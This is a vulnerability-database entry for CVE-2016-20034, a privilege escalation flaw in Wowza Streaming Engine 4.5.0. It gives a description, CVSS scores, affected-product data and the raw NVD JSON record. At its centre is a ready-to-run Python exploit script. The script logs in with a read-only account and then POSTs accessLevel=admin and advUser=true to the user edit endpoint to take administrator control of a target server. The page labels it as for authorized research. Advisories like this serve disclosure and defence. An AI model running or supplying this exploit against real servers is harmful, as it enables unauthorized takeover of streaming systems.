Security Vulnerability Report
中文
CVE-2016-20034 CVSS 8.8 HIGH

CVE-2016-20034

Published: 2026-03-16 14:17:51
Last Modified: 2026-03-19 14:16:48
Source: [email protected]

Description

Wowza Streaming Engine 4.5.0 contains a privilege escalation vulnerability that allows authenticated read-only users to elevate privileges to administrator by manipulating POST parameters. Attackers can send POST requests to the user edit endpoint with accessLevel set to 'admin' and advUser parameters set to 'true' and 'on' to gain administrative access.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:* - VULNERABLE
Wowza Streaming Engine 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2016-20034 PoC - Wowza Streaming Engine Privilege Escalation # Target: Wowza Streaming Engine 4.5.0 # Vulnerability: Authenticated read-only users can escalate privileges to admin def exploit_privilege_escalation(target_url, username, password): """ Exploit privilege escalation vulnerability in Wowza Streaming Engine by manipulating POST parameters to gain admin access. Args: target_url: Base URL of Wowza Streaming Engine admin panel username: Valid read-only user account password: Password for the user account Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Authenticate with read-only credentials login_url = f"{target_url}/enginemanager/API/login" login_data = { "username": username, "password": password } try: login_response = session.post(login_url, data=login_data, timeout=10) if login_response.status_code != 200: print(f"[-] Authentication failed with status code: {login_response.status_code}") return False print("[+] Successfully authenticated with read-only user") # Step 2: Exploit privilege escalation via user edit endpoint # Manipulate accessLevel to 'admin' and advUser to 'true'/'on' user_edit_url = f"{target_url}/enginemanager/API/user/edit" exploit_data = { "accessLevel": "admin", "advUser": "true", "username": username # Target user's own account or other users } exploit_response = session.post(user_edit_url, data=exploit_data, timeout=10) if exploit_response.status_code == 200: print("[+] Privilege escalation successful!") print("[+] User now has administrator privileges") return True else: print(f"[-] Exploitation failed with status code: {exploit_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://target.com:8080 admin password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print("[*] CVE-2016-20034 - Wowza Streaming Engine Privilege Escalation") print(f"[*] Target: {target}") print(f"[*] Credentials: {user}:{pwd}") exploit_privilege_escalation(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20034", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.507", "lastModified": "2026-03-19T14:16:48.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wowza Streaming Engine 4.5.0 contains a privilege escalation vulnerability that allows authenticated read-only users to elevate privileges to administrator by manipulating POST parameters. Attackers can send POST requests to the user edit endpoint with accessLevel set to 'admin' and advUser parameters set to 'true' and 'on' to gain administrative access."}, {"lang": "es", "value": "Wowza Streaming Engine 4.5.0 contiene una vulnerabilidad de escalada de privilegios que permite a usuarios autenticados de solo lectura elevar privilegios a administrador manipulando parámetros POST. Los atacantes pueden enviar solicitudes POST al endpoint de edición de usuario con accessLevel establecido en 'admin' y los parámetros advUser establecidos en 'true' y 'on' para obtener acceso administrativo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"}]}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/40133", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wowza-streaming-engine-privilege-escalation-via-user-edit", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.